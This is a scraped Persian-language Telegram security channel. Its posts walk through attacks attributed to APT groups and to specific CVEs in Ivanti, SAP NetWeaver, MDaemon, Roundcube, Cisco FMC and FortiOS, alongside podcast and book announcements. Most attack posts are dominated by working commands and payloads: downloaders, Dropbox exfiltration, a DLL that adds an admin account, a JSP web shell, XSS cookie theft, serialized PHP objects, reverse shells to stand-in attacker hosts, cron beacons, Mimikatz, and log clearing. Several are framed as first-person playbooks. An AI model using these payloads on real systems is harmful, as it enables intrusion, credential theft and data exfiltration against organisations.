گروه Lotus Panda یکی از گروههای APT چینیه که با استفاده از نسخه آپدیت شده Sagerunex Backdoor به هدفهایی تو حوزه دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیکهای پیشرفته نفوذ، بایپس مکانیزمهای امنیتی، و افزایش سطح دسترسی تو تارگت بهره میبره.
theHarvester -d target.com -l 500 -b google
nmap -sS -sV -p- -T4 target.com
shodan search "port:443 org:TargetOrganization"
Asunto: Actualización de seguridad obligatoria
Estimado usuario,
Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.
Atentamente,
Soporte Técnico
Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"
import dropbox
ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)
def send_data(data):
dbx.files_upload(data.encode(), "/logs/data.txt")
send_data("Captured keystrokes and files")
winPEAS.bat > report.txt
کد ساخت یک DLL مخرب تو C++
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
}
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows
Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"
Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security
https://news.1rj.ru/str/safe_defense/136
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11❤7👍7❤🔥4🔥2💩2🍌2👏1💯1🏆1
پست غیر فنی
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
👍117👎19👌8🤣7💩5❤4👏3🔥1
این آسیبپذیری یه stack-based buffer overflow تو نسخههای قبل از 22.7R2.5 از Ivanti Connect Secureه که به مهاجمای سایبری اجازه میده بدون احراز هویت، کد دلخواهشون رو بصورت ریموت اجرا کنن. این نقص تو دسامبر 2024 شناسایی و تو ژانویه 2025 پچ شد، اما قبل از اون تو حملاتی علیه سازمانهای ژاپنی مورد سوءاستفاده قرار گرفته بود.
تحلیل فنی:
اولین قدم اینه که بفهمیم چه سازمانهایی هنوز از نسخههای آسیبپذیر Ivanti Connect Secure (ICS) استفاده میکنن. اسکنرهایی مثل Shodan یا Censys برای این کار عالی هستن. با یه فیلتر ساده روی بنرهای SSL یا مسیرهای /dana-na/ راحت سرورهای ICS پیدا میشن.
http.noscript:"Welcome to Ivanti Connect Secure"
وقتی سرورهای هدف پیدا شدن، تست میکنیم ببینم نسخهی ICS آسیبپذیره یا نه. چون این آسیبپذیری یه stack-based buffer overflow توی یکی از کامپوننتهای مدیریت حافظهی ICS هست، معمولاً با یه درخواست ساده میشه کرش یا رفتار غیرعادی تو سرور ایجاد کرد.
curl -k -X POST https://victim-ics/dana-na/auth/url_default/login.cgi -d "reallylonginput=AAAAAA...."
اگر رفتار عجیبی دیدیم، سرور به احتمال زیاد آسیبپذیره.
وقتی مطمئن شدیم سیستم هدف آسیبپذیره، باید shell اولیه بگیریم. با توجه به اطلاعات لو رفته، اکثر هکرها از یه Perl Webshell ساده استفاده کردن که روی ICS دیپلوی شده. این Webshell با یک کوکی خاص فعال میشه.
curl -k --cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami
اگر جواب گرفتیم (مثلاً root یا admin)، یعنی کامل داخل سیستم هستیم.
حالا نوبت به نصب DslogdRAT میرسه که یه رت سبکه که از ارتباط رمزگذاری شده XOR استفاده میکنه. این رت فوقالعاده باهوشه؛ فعالیتش فقط بین ساعات اداری (8 صبح تا 2 بعدازظهر) هست تا وسط شب آلارم ایجاد نکنه.
هش مربوط به این رت:
1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8
مراحل بعدی:
برای اینکه دسترسی طولانی داشته باشیم:
از ICS به عنوان یک pivot point استفاده میکنیم:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥8❤4👏2👌1💯1
تو آوریل ۲۰۲۵ (که امروز آخرین روزش هم هست)، گروهی از هکرهایی که گفته وابسته به ایران هستند با نام UNC2428، یه کمپین پیچیدهی مهندسی اجتماعی رو علیه اهداف اسرائیلی اجرا کردن. این عملیات با استفاده از آگهیهای شغلی جعلی به نام شرکت دفاعی اسرائیلی «رافائل» انجام شده و بدافزاری به نام MURKYTOUR رو توزیع کرده. که تو ادامه میخوایم این حمله رو کمی تحلیل کنیم.
نمایش فرم GUI فیک برای پرکردن اطلاعات شغلی
اجرا شدن ماژول بدافزاری تو بکگراند
انجام Persistence از طریق Scheduled Task و Registry: Run
Please open Telegram to view this post
VIEW IN TELEGRAM
❤21🔥8👍7👌4❤🔥3🥰2🤬2🍌1
گروه APT1 یکی از شناختهشدهترین گروههای هکریه که توسط دولت چین پشتیبانی میشه. این گروه توسط گزارش مشهور شرکت Mandiant تو سال ۲۰۱۳ افشا شد و به متهم شد به حملات سایبری متعدد علیه سازمانهای غربی. یکی از این شرکتها Westinghouse Electric Company بود. دلیل این انتخاب اینه که این شرکت یکی از شرکتهای کلیدی تو طراحی، ساخت، و راهاندازی نیروگاههای هستهای تو آمریکاست و همچنین تکنولوژی هستهای به کشورهای دیگر (مثل کره جنوبی و ژاپن) صادر میکرد. درحقیقت اومدن این شرکت رو هک کردن تا بتونن به اسناد تجاری و تکنولوژی این شرکت دست پیدا کنن. خب میریم سروقت تحلیلمون:
محتوای فایل:
نمونه کد ماکرو VBA:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub
نمونه رفتار فرآیند:
Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden
Mimikatz:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
PsExec:
psexec.exe \\TARGET -u admin -p password cmd.exe
نمونه اسکریپت:
$files = Get-ChildItem -Recurse -Path "C:\Engineering\ReactorDesigns\" -Include *.docx,*.pdf,*.dwg
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\export.zip"
Invoke-WebRequest -Uri "http://203.81.99.37/upload" -Method POST -InFile "C:\Temp\export.zip"
schtasks /create /tn "Chrome Update" /tr "C:\Users\Public\chrome_upd.exe" /sc minute /mo 30
wevtutil cl Security
del /F /Q "C:\Users\*\AppData\Local\Temp\~*.log"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤🔥5🤬3⚡2🔥2💯2❤1🎉1🏆1
این endpoint به راحتی فایل رو با متد POST دریافت و روی سیستم ذخیره میکنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود میکنه و روی سرور اجرا میکنه!
POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary
--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--
http://target-victim.com/VCService/shell.jsp?cmd=whoami
و تمام! کد روی سرور اجرا میشه.
curl -X POST http://victim.com/developmentserver/metadatauploader \
-F "file=@shell.jsp" -H "Content-Type: multipart/form-data"
محتوای shell.jsp:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
out.println(line);
}
%>
curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبکتر و stealthتره.
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود میکنه:
<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفتهست:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤🔥4🔥4❤2🙏2💯2🎉1👌1
Shodan + Censys:
shodan search 'http.noscript:"MDaemon Webmail"' country:"RO"
whatweb http://mail.target.gov.ro
nmap -sV -p 3000-9000 mail.target.gov.ro
نتایج نشان داد که چندین هدف در اوکراین، رومانی و قبرس از نسخههای آسیبپذیر MDaemon Webmail استفاده میکنند (نسخههای قبل از 24.5.1).
آسیبپذیری XSS Reflected در پارامترهای سمت کلاینت در فرم پاسخدهی ایمیل:
POST /WorldClient.dll?View=Compose&Action=ReplyTo
Content-Type: application/x-www-form-urlencoded
body=<img src=x onerror="fetch('https://attacker.com/x?'+document.cookie)">
هنگام مشاهده پاسخ ایمیل توسط کاربر، کد JS اجرا میشود. اجرای کد در context دامنه MDaemon باعث سرقت session cookie و دسترسی به اینترفیس وبمیل میشود.
let payload = `
fetch('https://c2-server.evil/steal', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
ua: navigator.userAgent,
loc: window.location.href
})
});
`;
<img src=x onerror="${payload}">spoof-mail.py --from 'gov@ministry.gov.ua' --to 'employee@target.gov.ro' \
--subject 'وضعیت اضطراری ملی' --html-file payload.html
ایمیلها از طریق SMTP سرور open relay در آفریقا ارسال شدند. از محتوای فریبنده با عنوان "یادداشت امنیت ملی فوری" استفاده کردیم.
Cookie: auth_session=dkj34k2j4k2j34k23j4
User-Agent: Mozilla/5.0 (Windows NT 10.0)
curl -b "auth_session=..." https://mail.target.gov.ro/WorldClient.dll?View=Inbox
GET /WorldClient.dll?View=Settings&Folder=Passwords
GET /WorldClient.dll?View=2FA&Export
SMTP Host: smtp.target.gov.ro
IMAP User: admin@target.gov.ro
IMAP Pass: ********
POST /WorldClient.dll?View=AppPassword&Create
Body: name=devtool&pass=VeryLongAppToken123
ذخیره Token در vault تیم مهاجم برای بازگشت در آینده.
{ "cookies": "...", "2fa": "...", "imap": "...", "metadata": "..." }Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥6❤5❤🔥3⚡2👏2💯2🎉1😍1🍌1
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حسابهای کاربری معتبر و دسترسی از طریق اینترنت است.
$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]
$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">
از اونجایی که آسیبپذیری بعد از احراز هویت عمل میکنه، نیاز به یه حساب داریم:
Username: john@victim.com
Password: Company2023!
/program/actions/settings/upload.php
پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize میشه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا میکنیم.
class Exploit {
public $cmd;
function __destruct() {
system($this->cmd);
}
}
$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID
Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...
------XYZ
Content-Disposition: form-data; name="_from"
O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain
(fake content)
------XYZ--
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -lvnp 4444
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥12❤5👍3🔥2👏2⚡1🤯1🙏1💯1😈1👨💻1
#پادکست
🎤 اپیزود 88 رادیو امنیت - صدایی از تاریکی: ماجرای گنجشک درنده - یازدهم تیر 1404
💠 بررسی حمله سایبری به بانک سپه
⬅️ لینک CastBox
https://castbox.fm/vd/823884810
⏩ CyberWarfar
https://castbox.fm/vd/823884810
Please open Telegram to view this post
VIEW IN TELEGRAM
d.castbox.fm
Best free podcast app for Apple iOS and Android | Let words move you
Millions of podcasts for all topics. Listen to the best free podcast on Android, Apple iOS, Amazon Alexa, Google Home, Carplay, Android Auto, PC. Create...
❤10❤🔥3👍3⚡1👏1👌1💯1
حسابهای جیمیل کارمندای نهادهای دولتی، دیپلماتها، مؤسسات تحقیقاتی، و اهداف استراتژیک تو کشورهای غربی، بهویژه تو آمریکا و اتحادیه اروپا.
گروه APT29 با ارسال ایمیلهای فیشینگ هدفمند، قربانی رو به صفحاتی فیک هدایت میکنه که شباهت زیادی به صفحات لاگین واقعی گوگل دارن. اما نکته کلیدی اینجاست: حتی اگه قربانی احراز هویت دو مرحلهای (مثلاً کد SMS یا اپلیکیشن احراز هویت) رو وارد کنه، مهاجم همچنان میتونه دسترسی کامل بگیره.
گوگل به کاربرا اجازه میده برای اپلیکیشنهایی که از احراز هویت دو مرحلهای پشتیبانی نمیکنن، یه "رمز عبور اپلیکیشن" (App Password) تولید کنن. این رمز، یکبار مصرفه و نیازی به وارد کردن کد 2FA نداره.
Google Account → Security → Signing in to Google → App passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
👌18🔥4❤3👍3❤🔥2🥴2👎1🤔1👨💻1
سلام. وقت بخیر دوستان.
اگر از دوستان کسی آمادگی رکورد دورههای آموزشی شامل حوزه امنیت، برنامهنویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ میتونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم میشناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آیدی:
@vahid_elmi
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
اگر از دوستان کسی آمادگی رکورد دورههای آموزشی شامل حوزه امنیت، برنامهنویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ میتونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم میشناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آیدی:
@vahid_elmi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤4👏4🔥3🤮3
1. شناسایی (Reconnaissance)
nmap -sV -p 443,1812,1813 <target>
اسکن روی پورتهای 443 (Web UI) و 1812/1813 (RADIUS Authentication)
PORT STATE SERVICE VERSION
443/tcp open https Cisco Secure FMC WebUI
1812/udp open radius
1813/udp open radius-acct
وجود سرویس RADIUS روی FMC تأیید شد.
2. آمادهسازی Payload (Exploit Development)
نمونه دستور برای تست:
radtest "attacker; id;" password <FMC_IP> 1812 secret
اگه آسیبپذیر باشه، خروجی RADIUS شامل اجرای دستور id خواهد شد و تو لاگها یا پاسخ RADIUS مشاهده میشه.
3. اجرای Remote Code Execution (Initial Access)
radtest "user; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" pass <FMC_IP> 1812 secret
ابزار netcat روی سیستم مهاجم (nc -lvnp 4444) برای دریافت shell.
نتیجه: مهاجم یه Root Shell روی FMC به دست میآره.
4. تثبیت دسترسی (Persistence)
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
echo "* * * * * root curl http://ATTACKER_IP/beacon.sh | bash" >> /etc/crontab
curl -o /tmp/beacon http://ATTACKER_IP/beacon && chmod +x /tmp/beacon && /tmp/beacon &
5. حرکت جانبی (Lateral Movement)
مثال: استخراج credential ذخیرهشده تو FMC:
psql -U admin fmcdb -c "SELECT username,password FROM users;"
6. بهرهبرداری نهایی (Actions on Objectives)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤6👍4👏2⚡1❤🔥1💯1🏆1
Cyber Warfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤4👍3👏1👌1🤓1
وقتی اولین بار این کتاب رو دیدم، بیشتر از هر چیزی حس کردم لازمِ این روایت به زبان فارسی منتقل بشه. نه برای اینکه بگیم بقیه اشتباه کردن، بلکه چون این کتاب یه زاویهدید و دسترسی مستند به بخشی از دنیای سایبر میده که کمتر توی منابع فارسی به شکل منسجم و قابلفهم وجود داشته. به همین دلیل با دکتر رحیمیان تصمیم گرفتیم این اثر رو با دقت ترجمه کنیم تا هر کسی (چه متخصص باشه، چه مدیر، چه دانشجو یا فقط کنجکاو) بتونه ازش بهره ببره.
این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیبپذیریهای زیرو-دی، برنامههای دولتی برای توسعه جنگافزارهای سایبری و رقابت بین قدرتها برای برتری تو فضای دیجیتال. پرلروث سالها بهعنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیبپذیری نرمافزاری تا مقامات دولتی) روایتهایی میاره که هم تکوندهندهست و هم هشداردهنده.
ما توی ترجمه سعی کردیم دو چیز رو همزمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژهها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیمهای امنیت و هر کسی که میخواد بفهمه دنیاهای پشت پردهی تهدیدات سایبری چهطور کار میکنن باشه.
چرا باید این کتاب رو بخونین؟
چون نشونههای روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هکهای ساده و سرقت اطلاعات نیستن؛ این تهدیدها میتونن زیرساختها رو فلج کنن، سیاستها رو تحتتأثیر بذارن و در سطح بینالملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک میکنه دید استراتژیکتری نسبت به مدیریت ریسک، سرمایهگذاری تو امنیت و برنامهریزی دفاعی پیدا کنین.
این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابلاعتنا و درعینحال جذاب برای درک عمیقترِ جنگافزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.
ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که میتونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends
ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیبپذیریهای زیرو-دی، برنامههای دولتی برای توسعه جنگافزارهای سایبری و رقابت بین قدرتها برای برتری تو فضای دیجیتال. پرلروث سالها بهعنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیبپذیری نرمافزاری تا مقامات دولتی) روایتهایی میاره که هم تکوندهندهست و هم هشداردهنده.
ما توی ترجمه سعی کردیم دو چیز رو همزمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژهها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیمهای امنیت و هر کسی که میخواد بفهمه دنیاهای پشت پردهی تهدیدات سایبری چهطور کار میکنن باشه.
چرا باید این کتاب رو بخونین؟
چون نشونههای روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هکهای ساده و سرقت اطلاعات نیستن؛ این تهدیدها میتونن زیرساختها رو فلج کنن، سیاستها رو تحتتأثیر بذارن و در سطح بینالملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک میکنه دید استراتژیکتری نسبت به مدیریت ریسک، سرمایهگذاری تو امنیت و برنامهریزی دفاعی پیدا کنین.
این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابلاعتنا و درعینحال جذاب برای درک عمیقترِ جنگافزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.
ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که میتونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends
ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤7👍5👏2👨💻2⚡1🎉1💯1💔1
ES.pdf
1.5 MB
چند وقتی هست به دنبال برگزاری منظم همایش تخصصی حوزه امنیت هستم. تقریبا یک سالی هم هست روی هزینهها تحقیق کردم و با ارتباطاتی که با دانشجوها و مخاطبین حوزه داشتم، بازخورد خوبی از این موضوع گرفتم.
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر میکنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکتها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.
ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.
لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکتهایی میشناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.
با تشکر.
شماره تماس برای جزئیات بیشتر: 09209104151
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر میکنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکتها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.
ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.
لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکتهایی میشناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.
با تشکر.
شماره تماس برای جزئیات بیشتر: 09209104151
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16❤🔥3🔥3👏1🥱1💯1🏆1
یه آسیبپذیری خیلی جدّیه توی کامپوننت SSL-VPNِ محصولات Fortinet (FortiOS / FortiProxy): برنامهای که ترافیک SSL-VPN رو هندل میکنه گاهی بهخاطر ورودیهای ساختهشدهی خاص، یه نوشتهٔ خارج از بافر انجام میده؛ در نتیجه ممکنه حافظه خراب بشه و مهاجم بتونه کد یا دستور اجرا کنه. این باگ بهصورت ریموت و بدون نیاز به لاگین قابل بهرهبرداری گزارش شده و نمرهٔ بحرانی یعنی 9.6 داره. البته این آسیبپذیری مربوط به سال گذشته هست.
تصور کنین من یه هکر خارجیام که میخوام به شبکه یه سازمان بزرگ مثل یه بانک یا شرکت انرژی نفوذ کنم. دستگاه هدفم یه فورتیگیت با SSL VPN فعاله و نسخه آسیبپذیر FortiOS داره، مثلاً 7.2.5. این سناریو بر اساس حملات واقعی ساخته شده، مثل اون چیزی که تو گزارش Darktrace توضیح دادن: هکرها از CVE-2024-21762 برای اجرای کد از راه دور (RCE) بدون نیاز به احراز هویت استفاده کردن، بعدش به سوءاستفاده از اعتبارها و دسترسی RDP رسیدن. همچنین، بر پایه PoCهای عمومی تو گیتهاب مثل اسکریپت پایتون d0rb که RCE رو نشون میده. این حمله از راه دوره و بدون نیاز به لاگین اولیه، اما اگه تیم آبی مانیتورینگ داشته باشه، ریسک کشفش بالاست. در واقعیت، بیش از 133 هزار دستگاه آسیبپذیر بودن و هکرها مثل گروههای باجافزاری Qilin از حملات اتوماتیک استفاده کردن.
اول باید هدف رو پیدا کنیم. از ابزارهایی مثل Shodan یا Censys استفاده میکنیم تا دستگاههای فورتیگیت با SSL VPN باز رو جستجو کنیم:
کوئری مثل "FortiSSLVPN" یا پورتهای ۴۴۳/۱۰۴۴۳ با بنر "Fortinet"
nmap -p 443,10443 -sV --noscript http-noscript target-ip
تا نسخه FortiOS رو شناسایی کنیم. اگه لیست IPهارو داشته باشیم، از Masscan برای اسکن استفاده میکنیم.
تو عمل، از یه VPS مثل AWS یا DigitalOcean استفاده میکنیم تا traceable نباشه. تو حملات واقعی، هکرها از Shodan برای پیدا کردن بیش از ۱۳۳ هزار دستگاه آسیبپذیر استفاده کردن. مطمئن میشیم SSL VPN فعاله. این مرحله حدود ۱۰ تا ۳۰ دقیقه طول میکشه.
حالا نوبت بهرهبرداریه. ابزارهای اصلی PoCهای گیتهاب هستن، مثل:
d0rb/CVE-2024-21762
abrewer251/CVE-2024-21762_FortiNet_PoC
h4x0r-dz/CVE-2024-21762
BishopFox/cve-2024-21762-check
آسیبپذیری تو اندپوینت /remote/hostcheck_validate SSL VPN هست، جایی که یه out-of-bounds write (با دو بایت اورفلو) اجازه تزریق کامند میده. از پایتون استفاده میکنیم تا ریکوئست HTTP سفارشی بفرستیم.
git clone https://github.com/d0rb/CVE-2024-21762
shell
Netcat (nc -e /bin/sh attacker-ip 4444).
گام به گام:
shell
nc -lvnp 4444
shell
python3 exploit.py --target https://target-ip:10443 --payload "curl attacker-ip/payload.sh | bash"
این ریکوئست به /remote/hostcheck_validate فرستاده میشه با هدرهای malformed برای تریگر اورفلو و اجرای کامند.
تو حملات واقعی، هکرها از این مورد برای اجرای curl به فایلهای js یا py (مثل exp-7.2.6.py) استفاده کردن تا بکدور نصب کنن. زمان این مرحله ۵ تا ۱۵ دقیقهست. اگه کرش کنه، با payload کوچکتر retry میکنیم. تو گزارش Rapid7، گفتن که state-sponsored actors از این zero-dayها استفاده کردن. همچنین، تو آوریل ۲۰۲۵، بیش از ۱۴ هزار دستگاه با روشهای جدید post-exploitation compromised شدن.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11👍4🔥4🙏2
بعد از گرفتن shell، کار اصلی شروع میشه. از Metasploit برای persistence استفاده میکنیم (مثل ماژول fortigate_ssl_vpn اگه سفارشیش کنیم)، یا Cron برای بکدور. Cobalt Strike برای C2 عالیه.
تو حمله Darktrace، هکرها بعد از RCE به credential abuse و RDP رسیدن. برای persistence، تو گزارش Fortinet، threat actor از vulnerability برای read-only access بعد از پچ استفاده کرده. کل حمله میتونه در ۱ تا ۲ ساعت تموم بشه، اما اگه بخوایم ماندگار بمونیم، cron job میذاریم برای چک روزانه.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9❤🔥5👏4👍3💩1
یه سایت با شعار «زندگی کوتاهه، خیانت کن!»... و یه نشت اطلاعات که دنیا رو شوکه کرد.
تو این اپیزود از رادیو امنیت، میریم پشت صحنهی یکی از جنجالیترین افشاگریهای سایبری تاریخ؛ یعنی ماجرای نشت اطلاعات سایت Ashley Madison رو باهم بررسی میکنیم. اینجا فقط بحث یه هک نیست؛ بحث زندگی میلیونها آدمه که با یه کلیک، همهچیزشون لو رفت؛ از رابطههای پنهان تا جزئیترین رازهای شخصیشون. طوری که یه کشیش به دلیل رسوایی اخلاقی ناشی از نشت اطلاعات خودکشی کرد.
با من همراه بشین تا ببینیم چطور یه تیم هکری با اسم “Impact Team”، سایتی با میلیونها کاربر رو به زانو درآورد، و چطور این حادثه نگاه دنیا رو به مفهوم «حریم خصوصی» برای همیشه عوض کرد.
شنیدن این پادکست در کستباکس:
https://castbox.fm/episode/id3634195-id510574091
لطفا نظرتون در مورد پادکست و همچنین موضوع مهم "حریم خصوصی" تو کامنتها با من در میون بزارین.
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
تو این اپیزود از رادیو امنیت، میریم پشت صحنهی یکی از جنجالیترین افشاگریهای سایبری تاریخ؛ یعنی ماجرای نشت اطلاعات سایت Ashley Madison رو باهم بررسی میکنیم. اینجا فقط بحث یه هک نیست؛ بحث زندگی میلیونها آدمه که با یه کلیک، همهچیزشون لو رفت؛ از رابطههای پنهان تا جزئیترین رازهای شخصیشون. طوری که یه کشیش به دلیل رسوایی اخلاقی ناشی از نشت اطلاعات خودکشی کرد.
